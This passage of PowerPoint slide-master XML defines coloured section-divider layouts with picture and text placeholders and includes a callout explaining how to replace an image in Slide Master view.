          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr lang="en-US" sz="850" b="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30525640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pink_#_1">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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12444943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plum_#_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16234256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dark plum_#_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30157675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image_#_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="40000"/>
            <a:lumOff val="6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07F8FE-17A3-46C6-8E23-99B08D1E4C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6457101" y="1347665"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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8" y="1341438"/>
            <a:ext cx="5552892" cy="1745111"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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8" y="3104478"/>
            <a:ext cx="5552892" cy="732413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>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
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7861768" y="2169251"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Callout: Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF204DF2-7FD0-478F-980D-A07EB0101292}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="12856683" y="0"/>
            <a:ext cx="2038121" cy="4617720"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 18750"/>
              <a:gd name="adj2" fmla="val -8333"/>
              <a:gd name="adj3" fmla="val 23170"/>
              <a:gd name="adj4" fmla="val -23198"/>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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>How to change image</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-GB" sz="800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Click on ‘View’ on the menu bar</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Choose ‘Slide Master’ </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Insert image and size to fit the page (make sure the coloured strip isn’t covered on the right hand side)</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Right click on the image and choose ‘send to back’</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 View ‘normal’ to exit Slide Master Mode</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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79350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white_#_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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="accent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pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E489B54B-7193-4CFC-A69B-CC135969E161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="60294" t="22177" r="9338" b="33379"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165411" y="911223"/>
            <a:ext cx="3702423" cy="3048080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19163576-E8E1-4806-B23A-BE97EF09C47A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676121" y="1559649"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11708837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yellow_#_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>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99784982-D915-4281-8B9B-A7D6715DBB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267316" y="738369"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78036A-3996-49A3-A390-73E198A66E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671983" y="1559955"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4873291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orange_#_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent3"/>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99784982-D915-4281-8B9B-A7D6715DBB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267316" y="738369"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78036A-3996-49A3-A390-73E198A66E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671983" y="1559955"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="12000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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7" y="4823012"/>
            <a:ext cx="7041033" cy="507892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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7" y="5348834"/>
            <a:ext cx="7041033" cy="281002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr sz="16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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30013728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pink_#_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent4"/>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99784982-D915-4281-8B9B-A7D6715DBB04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267316" y="738369"/>
            <a:ext cx="4965239" cy="3439487"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Text Placeholder 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78036A-3996-49A3-A390-73E198A66E21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1671983" y="1559955"/>
            <a:ext cx="2519362" cy="1595919"/>
          </a:xfrm>
        </p:spPr>
